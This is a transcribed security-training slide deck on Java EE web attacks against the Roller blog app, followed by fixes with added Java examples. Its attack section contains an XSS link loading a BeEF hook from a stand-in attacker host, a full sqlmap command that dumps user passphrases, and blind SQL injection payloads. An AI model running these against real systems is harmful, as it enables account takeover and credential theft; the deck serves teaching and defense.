Java EE Web Security By Example JAX 2012
May 06, 2015
About
• Frank Kim
– Consultant, ThinkSec
– Author, SANS Secure Coding in Java/JEE
– SANS Application Security Curriculum Lead
What You Should Know
• Hacking is not hard
• Don’t trust any data
– Assume that your users are evil!
Outline
• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs
Cross-Site Scripting (XSS)
• Occurs when unvalidated data is displayed back to the browser
• Types of XSS
– Stored
– Reflected
– Document Object Model (DOM) based
Cross-Site Request Forgery (CSRF)
SQL Injection (SQLi)
• Occurs when dynamic SQL queries are used
– By injecting arbitrary SQL commands, attackers can extend the meaning of the original query
– Can potentially execute any SQL statement on the database
• Very powerful
– #1 on CWE/SANS Top 25 Most Dangerous Software Errors
– #1 on OWASP Top 10
Outline
• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs
What are We Testing?
• Installation of Roller 3.0
• Fake install of SANS AppSec Street Fighter Blog
• Want to simulate the actions that a real attacker might take
– There are definitely other avenues of attack
– We're walking through one attack scenario
Attack Scenario
1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack
- Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly
Spot the Vuln - XSS
XSS in head.jsp
Testing the "look" Param
• Admin pages include head.jsp
• The param is persistent for the session
XSS Exploitation
• Introducing BeEF
– Browser Exploitation Framework
– http://www.bindshell.net/tools/beef
• Uses XSS to hook the victim's browser
– Log user keystrokes, view browsing history, execute JavaScript, etc
– Advanced attacks - Metasploit integration, browser exploits, etc
XSS Exploitation Overview
Attacker / Victim
1) Attacker sends link with evil BeEF script:
http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
2) Victim clicks evil link
3) Victim's browser sends data to attacker
BeEF XSS Demo
Spot the Vuln - CSRF
CSRF in UserAdmin.jsp
(screenshot caption) Want to use CSRF to change this field
CSRF Demo
Spot the Vuln – SQL Injection
SQL Injection in UserServlet
SQL Injection Testing
• UserServlet is vulnerable to SQLi
– http://localhost:8080/roller/roller-ui/authoring/user
(screenshot of the response: No results)
Exploiting SQL Injection
• Introducing sqlmap
– http://sqlmap.sourceforge.net
• Tool that automates detection and exploitation of SQL Injection vulns
– Supports MySQL, Oracle, PostgreSQL, MS SQL Server
– Supports blind, inband, and batch queries
– Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc
– Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc
sqlmap Syntax
• Dump userids and passwords
python sqlmap.py -u "http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25" --cookie "username=test; JSESSIONID==<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2
SQL Injection Demo
How it Works
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy
Step By Step [0]
SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;
returns ilovethetajmahal
Step By Step [1]
select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);
returns i
select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);
returns l
select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);
returns o
Step By Step [2]
select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));
returns 105
select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));
returns 108
select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));
returns 111
Attack Summary
1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack
- Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly
Outline
• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs
Figure: Data Validation. Inbound Data passes through Validation before the Application consumes it ("Should I be consuming this?"); Outbound Data passes through Encoding before the Application emits it ("Should I be emitting this?"). The same Validation and Encoding boundary sits between the Application and the Data Store in both directions.
Output Encoding
• Encoding
– Convert characters so they are treated as data and not special characters
• Must escape differently depending where data is displayed on the page
• XSS Prevention Cheat Sheet
– http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
Fix XSS in head.jsp
• Add URL encoding
<link rel="stylesheet" type="text/css" media="all"
      href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />
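The slide says encoding must match the context the data lands in. The following is an added example, not Roller's code and not ESAPI: it shows the head.jsp link built with the raw theme value beside the same link with the value URL-encoded first, and a separate HTML-body encoder to make the point that the two contexts need different transformations. The class name LookParamEncoding, the two encoder methods and the constructed HOSTILE_THEME value are assumptions chosen for this example; in a real application use ESAPI or the OWASP Java Encoder as the slide recommends.

```java
import java.nio.charset.StandardCharsets;

/**
 * Added example: context-aware output encoding for the "look" parameter.
 * Not Roller's code and not ESAPI; the encoders are minimal stand-ins so
 * the program runs without any library.
 */
public class LookParamEncoding {

    // Constructed sample value in the style of the slide's head.jsp link:
    // it closes the href attribute and starts a script tag.
    static final String HOSTILE_THEME =
        "\"><script src=\"http://example.invalid/hook.js\"></script>";

    /** Vulnerable (before): the theme lands raw inside an HTML attribute. */
    static String vulnerableLink(String contextPath, String theme) {
        return "<link rel=\"stylesheet\" type=\"text/css\" media=\"all\" href=\""
             + contextPath + "/roller-ui/theme/" + theme + "/colors.css\" />";
    }

    /** Fixed (after): the theme is URL-encoded before it is placed in the path. */
    static String fixedLink(String contextPath, String theme) {
        return "<link rel=\"stylesheet\" type=\"text/css\" media=\"all\" href=\""
             + contextPath + "/roller-ui/theme/" + encodeForUrl(theme) + "/colors.css\" />";
    }

    /** Percent-encoding: every byte outside the unreserved set becomes %XX. */
    static String encodeForUrl(String s) {
        StringBuilder sb = new StringBuilder();
        for (byte b : s.getBytes(StandardCharsets.UTF_8)) {
            int c = b & 0xff;
            boolean unreserved = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9') || c == '-' || c == '_' || c == '.' || c == '~';
            if (unreserved) {
                sb.append((char) c);
            } else {
                sb.append('%').append(String.format("%02X", c));
            }
        }
        return sb.toString();
    }

    /** HTML entity encoding for body text: the characters that matter for XSS. */
    static String encodeForHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char ch : s.toCharArray()) {
            switch (ch) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default:   sb.append(ch);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        System.out.println("vulnerable: " + vulnerableLink("/roller", HOSTILE_THEME));
        System.out.println("fixed:      " + fixedLink("/roller", HOSTILE_THEME));
        // A legitimate theme name passes through the URL encoder unchanged.
        System.out.println("benign:     " + fixedLink("/roller", "basic"));
        // The same value placed in HTML body text needs the HTML encoder instead.
        System.out.println("html body:  " + encodeForHtml(HOSTILE_THEME));
    }
}
```

In the fixed output the quote and angle brackets come out as %22, %3C and %3E, so the browser never sees an attribute boundary or a tag inside the href; the same characters become &quot;, &lt; and &gt; when the value is emitted as body text, which is why one encoder does not cover both slots.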
Fix CSRF in Update User Functionality
• UserAdmin.jsp – Add anti-CSRF token
<input type="hidden" name="<%= CSRFTokenUtil.SESSION_ATTR_KEY %>" value="<%= CSRFTokenUtil.getToken(request.getSession(false)) %>" >
• UserAdminAction.java – Check anti-CSRF token
if (!CSRFTokenUtil.isValid(req.getSession(false), req)) {
    return mapping.findForward("error");
}
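The slide calls CSRFTokenUtil.getToken and CSRFTokenUtil.isValid but does not show what they do. The following is an added, hypothetical synchronizer-token helper written for this page, not Roller's CSRFTokenUtil: the session and the request parameters are modelled as plain maps so it runs outside a servlet container, and the class name CsrfTokenExample, the hiddenField method and the map-based signatures are assumptions of this example.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

/**
 * Added example of a synchronizer-token helper in the shape implied by the
 * slide's CSRFTokenUtil calls. Hypothetical implementation, not Roller's code;
 * session and request are plain maps so the program runs stand-alone.
 */
public class CsrfTokenExample {
    static final String SESSION_ATTR_KEY = "csrfToken";
    private static final SecureRandom RNG = new SecureRandom();

    /** Returns the session's token, creating one on first use (one token per session). */
    static String getToken(Map<String, Object> session) {
        String token = (String) session.get(SESSION_ATTR_KEY);
        if (token == null) {
            byte[] raw = new byte[32];                       // 256 bits of CSPRNG output
            RNG.nextBytes(raw);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
            session.put(SESSION_ATTR_KEY, token);
        }
        return token;
    }

    /** Valid only if a session exists, it holds a token, and the request echoes it exactly. */
    static boolean isValid(Map<String, Object> session, Map<String, String> requestParams) {
        if (session == null) return false;                   // mirrors getSession(false) == null
        String expected = (String) session.get(SESSION_ATTR_KEY);
        String supplied = requestParams.get(SESSION_ATTR_KEY);
        if (expected == null || supplied == null) return false;
        // Constant-time comparison so the token cannot be recovered through timing.
        return MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                     supplied.getBytes(StandardCharsets.UTF_8));
    }

    /** The hidden field UserAdmin.jsp emits; base64url never contains a quote, but escape anyway. */
    static String hiddenField(Map<String, Object> session) {
        return "<input type=\"hidden\" name=\"" + SESSION_ATTR_KEY + "\" value=\""
             + getToken(session).replace("\"", "&quot;") + "\">";
    }

    public static void main(String[] args) {
        Map<String, Object> session = new HashMap<>();
        System.out.println(hiddenField(session));

        // Legitimate form post: the browser returns the field from the page it rendered.
        Map<String, String> goodPost = new HashMap<>();
        goodPost.put(SESSION_ATTR_KEY, getToken(session));
        goodPost.put("userName", "test");
        System.out.println("legitimate post valid: " + isValid(session, goodPost));

        // Cross-site post (constructed): the victim's cookie rides along with the request,
        // but the attacker's page cannot read the token, so the field is missing.
        Map<String, String> forgedPost = new HashMap<>();
        forgedPost.put("userName", "test");
        forgedPost.put("userAdmin", "true");
        System.out.println("forged post valid:     " + isValid(session, forgedPost));
        System.out.println("no session valid:      " + isValid(null, goodPost));
    }
}
```

The check is only as good as its placement: every state-changing action in UserAdminAction must call isValid before doing work, and the token has to be compared against the session, never against a second request parameter or a cookie the attacker's page could also set.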
Fix SQL Injection in UserServlet.java
• Use parameterized queries correctly
if (startsWith == null || startsWith.equals("")) {
    query = "SELECT username, emailaddress FROM rolleruser";
    stmt = con.prepareStatement(query);
} else {
    query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";
    stmt = con.prepareStatement(query);
    stmt.setString(1, startsWith + "%");
    stmt.setString(2, startsWith + "%");
}
rs = stmt.executeQuery();
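The following is an added example built around the UserServlet fix above; it is not Roller's code. It shows the vulnerable concatenation beside the parameterized version and goes slightly beyond the slide in two ways a practitioner will want: an allow-list check on startsWith, and escaping of LIKE wildcards, because a "%" or "_" bound through setString is still a wildcard to LIKE (the sqlmap URL on the earlier slide relies on "f%" doing exactly that). The class name UserLookup, the methods prepareLookup, findUsers and escapeLike, and the SAFE_PREFIX pattern are assumptions of this example; findUsers needs a live JDBC Connection, while main exercises the parts that run without one.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

/**
 * Added example around the UserServlet fix on the slide. Not Roller's code:
 * UserLookup, prepareLookup, findUsers, escapeLike and SAFE_PREFIX are names
 * chosen here. Keeps the slide's parameterized query and adds an allow-list
 * on the input plus LIKE-wildcard escaping.
 */
public class UserLookup {
    // Username / e-mail prefixes contain only these characters; anything else is rejected.
    static final Pattern SAFE_PREFIX = Pattern.compile("^[A-Za-z0-9._@-]{1,64}$");

    /** Vulnerable (before): the parameter is concatenated into the SQL text. */
    static String vulnerableQuery(String startsWith) {
        return "SELECT username, emailaddress FROM rolleruser WHERE username like '"
             + startsWith + "%' or emailaddress like '" + startsWith + "%'";
    }

    /** Escape LIKE metacharacters with '!' so the bound value only matches literally. */
    static String escapeLike(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }

    /** Fixed (after): allow-list the input, bind it as a parameter, escape LIKE wildcards. */
    static PreparedStatement prepareLookup(Connection con, String startsWith) throws SQLException {
        if (startsWith == null || startsWith.isEmpty()) {
            return con.prepareStatement("SELECT username, emailaddress FROM rolleruser");
        }
        if (!SAFE_PREFIX.matcher(startsWith).matches()) {
            throw new IllegalArgumentException("startsWith contains disallowed characters");
        }
        PreparedStatement stmt = con.prepareStatement(
            "SELECT username, emailaddress FROM rolleruser"
          + " WHERE username like ? ESCAPE '!' or emailaddress like ? ESCAPE '!'");
        String pattern = escapeLike(startsWith) + "%";   // the only live '%' is the one we add
        stmt.setString(1, pattern);
        stmt.setString(2, pattern);
        return stmt;
    }

    /** Runs the lookup and returns "username <emailaddress>" rows; needs a real Connection. */
    static List<String> findUsers(Connection con, String startsWith) throws SQLException {
        List<String> users = new ArrayList<>();
        try (PreparedStatement stmt = prepareLookup(con, startsWith);
             ResultSet rs = stmt.executeQuery()) {
            while (rs.next()) {
                users.add(rs.getString("username") + " <" + rs.getString("emailaddress") + ">");
            }
        }
        return users;
    }

    public static void main(String[] args) {
        // Constructed inputs: a normal prefix and the quote/wildcard-bearing value from the slide.
        String hostile = "f%' AND 'neEy' LIKE 'neEy";
        System.out.println("vulnerable SQL text:         " + vulnerableQuery(hostile));
        System.out.println("allow-list accepts \"frank\":  " + SAFE_PREFIX.matcher("frank").matches());
        System.out.println("allow-list accepts hostile:  " + SAFE_PREFIX.matcher(hostile).matches());
        System.out.println("bound pattern for \"f_x\":    " + escapeLike("f_x") + "%");
    }
}
```

The parameter binding is what stops the quote from changing the query's structure; the allow-list and the ESCAPE clause close the smaller hole the slide's fix still leaves, where a user-supplied wildcard turns a prefix search into a match on every row.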
Building Secure Software
Source: Microsoft SDL
Remember
• Hacking is not hard
• Don’t trust any data
– Validate input
– Encode output
– Use CSRF tokens
– Use parameterized queries